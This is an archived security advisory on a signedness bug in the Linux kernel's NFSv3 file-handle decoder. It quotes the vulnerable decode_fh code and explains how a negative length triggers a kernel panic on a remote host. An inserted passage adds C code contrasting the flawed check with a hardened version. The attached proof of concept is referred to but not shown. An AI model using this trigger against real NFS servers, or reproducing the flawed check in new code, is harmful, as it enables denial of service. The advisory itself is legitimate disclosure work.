TUCoPS :: Linux :: General :: bt758.txt

Remote Linux Kernel < 2.4.21 DoS in XDR routine.



Hello all,

I have discovered a signed/unsigned issue in a routine responsible for
demarshalling XDR data for NFSv3 procedure calls. As far as I can tell,
this bug has existed since NFSv3 support was integrated. It has been
silently fixed in 2.4.21.

The bug is in the decode_fh routine of fs/nfsd/nfs3xdr.c under the kernel
source tree.

Vulnerable code:

static inline u32 *
decode_fh(u32 *p, struct svc_fh *fhp)
{
        int size;
        fh_init(fhp, NFS3_FHSIZE);
        size = ntohl(*p++);
        if (size > NFS3_FHSIZE)
                return NULL;

        memcpy(&fhp->fh_handle.fh_base, p, size);
        fhp->fh_handle.fh_size = size;
        return p + XDR_QUADLEN(size);
}

Here p points at a packet of attacker-controlled XDR data. If size is negative, the
sanity check (size > NFS3_FHSIZE) still passes, and the negative value is handed to
memcpy, where it is converted to an enormous unsigned length. Because of how the
kernel's memcpy behaves, this causes a very large copy in kernel space, resulting in
an instant kernel panic.
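To make the conversion concrete, here is an added example (my code, not the advisory's and not the kernel's): the length check from decode_fh, isolated so the signed comparison can be observed without performing any copy, beside a hardened decoder that reads the XDR length as unsigned. NFS3_FHSIZE, XDR_QUADLEN and the simplified struct svc_fh are assumed stand-ins for the kernel definitions, and the XDR buffers are constructed inline.

```c
/* Added example: the decode_fh length check next to a hardened version.
 * Not the advisory's code; kernel names below are simplified stand-ins. */
#include <stdint.h>
#include <string.h>
#include <arpa/inet.h>

#define NFS3_FHSIZE 64                       /* assumed, as in the kernel */
#define XDR_QUADLEN(l) (((l) + 3) >> 2)      /* bytes -> 32-bit XDR words */

/* Simplified stand-in for the kernel's struct svc_fh (assumption). */
struct svc_fh { unsigned char fh_base[NFS3_FHSIZE]; uint32_t fh_size; };

/* Build a constructed XDR opaque: 4-byte big-endian length, then the data. */
void build_fh_arg(uint32_t *buf, int32_t wire_size, const unsigned char *data)
{
    buf[0] = htonl((uint32_t)wire_size);
    if (data && wire_size > 0)
        memcpy(buf + 1, data, (size_t)wire_size);
}

/* The original test, with no copy performed: a negative int satisfies
 * size > NFS3_FHSIZE and silently becomes a huge size_t. Returns 1 if the
 * original check would accept the length; *copy_len is what memcpy would see. */
int original_check_accepts(const uint32_t *p, size_t *copy_len)
{
    int size = (int)ntohl(*p);               /* signed, as in the kernel */
    if (size > NFS3_FHSIZE)
        return 0;
    *copy_len = (size_t)size;                /* -1 becomes SIZE_MAX */
    return 1;
}

/* Hardened decoder: an unsigned length turns any "negative" wire value into
 * a large one, so the single upper-bound check rejects it before memcpy. */
uint32_t *decode_fh_fixed(uint32_t *p, struct svc_fh *fhp)
{
    uint32_t size = ntohl(*p++);
    memset(fhp, 0, sizeof *fhp);
    if (size > NFS3_FHSIZE)
        return NULL;
    memcpy(fhp->fh_base, p, size);
    fhp->fh_size = size;
    return p + XDR_QUADLEN(size);
}
```

Equivalently, keeping int and adding an explicit size < 0 test closes the same hole; reading the length as unsigned just makes the single comparison sufficient.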

The attached code is a proof of concept (PoC) for this vulnerability. It requires that the
vulnerable host have an exported directory available to the attacker. This is
probably not the only way to trigger this bug, however.

If you have any questions, please feel free to contact me.

Cheers,

Jared Stanbrough <jareds@pdx.edu>

